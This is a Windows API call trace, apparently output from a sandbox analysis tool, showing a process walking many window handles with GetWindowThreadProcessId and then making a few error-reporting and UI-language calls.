	[0933.000] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x540
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x538
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x568
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x538
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x568
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x538
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x540
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x540
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x57c
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x460
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x554
	[0933.001] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x528
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x79c
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4e0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.002] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x460
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x460
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x44c
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x778
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x460
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x558
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x25d8
	[0933.003] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2594
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2590
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2530
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x251c
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2254
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2250
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16f0
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1338
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ca0
	[0933.004] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x238c
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b08
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a8c
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18e0
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2344
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1d8c
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1038
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a58
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c7c
	[0933.005] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f04
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18b8
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x22c8
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x21b8
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x21c0
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x219c
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20f4
	[0933.006] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20e4
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20e8
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20ec
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20f0
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e34
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc38
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1fe4
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f10
	[0933.007] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f0c
	[0933.008] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f08
	[0933.008] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ef0
	[0933.008] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1eec
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ee4
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ed8
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ed0
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e8c
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e88
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e84
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1604
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c2c
	[0933.009] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c08
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c0c
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c10
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c14
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c18
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c1c
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16fc
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e78
	[0933.010] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c20
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x191c
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1748
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1bb4
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10bc
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b50
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14b4
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x149c
	[0933.011] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14a8
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1490
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14a4
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x148c
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1458
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b4c
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b3c
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x19bc
	[0933.012] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x199c
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1998
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1994
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1990
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1984
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x197c
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1978
	[0933.013] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1824
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1088
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1908
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18cc
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18d0
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1840
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10c4
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x128c
	[0933.014] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16e8
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16cc
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x274
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10e0
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10cc
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10c0
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10d0
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1198
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1080
	[0933.015] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1074
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x106c
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1474
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1414
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xbd0
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x550
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa38
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16d0
	[0933.016] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16d4
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x15bc
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x15a0
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x159c
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1598
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1594
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1590
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x158c
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1588
	[0933.017] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1584
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1580
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x157c
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1488
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1404
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11b8
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xbd4
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe0c
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xd30
	[0933.018] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe70
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13b8
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe20
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe2c
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe00
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe04
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc94
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13b0
	[0933.019] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13ac
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13a8
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1374
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x132c
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1328
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12d0
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12cc
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12c8
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1290
	[0933.020] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1218
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1214
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11ec
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11e8
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11cc
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1140
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe6c
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x6e8
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc6c
	[0933.021] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf94
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xffc
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf74
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf08
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf0c
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xed8
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe90
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xea8
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfa8
	[0933.022] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfbc
	[0933.023] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfb8
	[0933.023] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfb4
	[0933.023] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfb0
	[0933.023] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfac
	[0934.056] WerSetFlags () returned 0x0
	[0934.066] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0934.066] CoTaskMemFree (pv=0x0) 
	[0934.067] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcda08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcda00 | out: pulNumLanguages=0xcda08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcda00) returned 1
